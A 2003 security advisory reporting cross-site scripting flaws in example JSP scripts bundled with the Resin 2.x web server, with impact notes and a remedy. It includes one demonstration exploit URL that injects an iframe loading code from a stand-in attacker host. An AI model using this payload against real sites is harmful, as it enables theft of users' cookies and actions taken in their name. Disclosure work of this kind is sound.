Resin Web Server Example Scripts Permit Remote Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1007958
SecurityTracker URL:  http://securitytracker.com/id/1007958
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Oct 20 2003
Impact:   Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Exploit Included:  Yes
Version(s): 2.x
Description:   An input validation vulnerability was reported in some Resin web server example scripts. A remote user can conduct cross-site scripting attacks.

exploitlabs.com reported that several example scripts provided with the web server do not properly filter user-supplied input before displaying the input. The affected applications include:

env.jsp
form.jsp
session.jsp
tictactoe.jsp

Using these scripts, a remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the vulnerable Resin script software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A demonstration exploit URL is provided:

http://[host]:8080/examples/tictactoe/tictactoe.jsp?move=<iframe%20src="http://attcker/evil.cgi"></iframe>4

It is also reported that guestbook.jsp allows a remote user to post a message that contains HTML code in the "name" and "comment" fields. Then, when a target user views the guest book entry, the HTML code will be executed.

Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the vulnerable Resin script software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
Solution:   The report indicates that Resin 3.x versions do not contain the example scripts.
